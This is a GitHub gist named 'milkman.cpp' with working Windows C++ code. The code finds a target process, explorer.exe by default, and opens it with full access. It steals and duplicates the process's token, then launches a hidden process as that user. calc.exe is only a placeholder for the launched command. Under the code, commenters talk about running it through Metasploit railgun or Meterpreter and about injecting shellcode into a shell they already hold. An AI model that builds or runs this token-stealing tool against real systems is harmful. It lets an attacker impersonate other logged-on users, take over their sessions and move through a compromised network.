Create a gist now

Instantly share code, notes, and snippets.

@mubix /milkman.cpp
Last active May 12, 2016

Milkman
#ifndef UNICODE
#define UNICODE
#endif
#include <Windows.h>
#include <string.h>
#include <stdio.h>
#include <Psapi.h>
void perror(DWORD nStatus)
{
LPVOID lpMsgBuf;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
nStatus,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR)&lpMsgBuf,
0, NULL);
wprintf(L"[-] %6d %s\n", nStatus, lpMsgBuf);
if (lpMsgBuf) {
LocalFree(lpMsgBuf);
}
}
int str_ends_with(TCHAR * str, TCHAR * suffix)
{
if (str == NULL || suffix == NULL)
{
return 0;
}
size_t str_len = wcslen(str);
size_t suffix_len = wcslen(suffix);
if (suffix_len > str_len)
{
return 0;
}
return 0 == wcscmp(str + str_len - suffix_len, suffix);
}
int start_process(int PID)
{
TCHAR cmd[512] = TEXT("calc.exe");
STARTUPINFO startup_info;
PROCESS_INFORMATION process_information;
SECURITY_IMPERSONATION_LEVEL impLevel = SecurityImpersonation;
LPVOID pEnvironment;
HANDLE hProc = NULL;
HANDLE hToken = NULL;
HANDLE hTokenDup = NULL;
ZeroMemory(&startup_info, sizeof(startup_info));
startup_info.cb = sizeof(startup_info);
ZeroMemory(&process_information, sizeof(process_information));
ZeroMemory(&pEnvironment, sizeof(pEnvironment));
hProc = OpenProcess(GENERIC_ALL, FALSE, PID);
//perror(GetLastError());
OpenProcessToken(hProc, GENERIC_ALL, &hToken);
//perror(GetLastError());
ImpersonateLoggedOnUser(hToken);
//perror(GetLastError());
DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, impLevel, TokenPrimary, &hTokenDup);
//perror(GetLastError());
CreateProcessAsUser(hTokenDup, NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, &pEnvironment, NULL, &startup_info, &process_information);
//perror(GetLastError());
return 0;
}
int find(TCHAR *name)
{
//wprintf(TEXT("Looking for %s\n"), name);
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
HANDLE hProcessEnum;
TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>");
if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
{
return 1;
}
cProcesses = cbNeeded / sizeof(DWORD);
for (i = 0; i < cProcesses; i++)
{
if (aProcesses[i] != 0)
{
hProcessEnum = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses[i]);
if (NULL != hProcessEnum)
{
GetProcessImageFileName(hProcessEnum, szProcessName, sizeof(szProcessName) / sizeof(TCHAR));
if (str_ends_with(szProcessName, name))
{
//wprintf(TEXT("[+] %d -\t%s\n"), aProcesses[i], szProcessName);
start_process(aProcesses[i]);
}
}
}
}
return 0;
}
int wmain(int argc, TCHAR * argv[])
{
if (argc > 1 && argv[1])
{
find(argv[1]);
//sperror(GetLastError());
}
else
{
find(TEXT("explorer.exe"));
//perror(GetLastError());
}
return 0;
}
@Meatballs1

I reckon you could railgun this :)

@mubix
Owner
mubix commented Aug 18, 2014

@Meatballs1 true, but what would be the reason? If you already have a shell you can shellcode inject into it.

@OJ
OJ commented Aug 22, 2014

Would be easier to throw it in Meterp :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment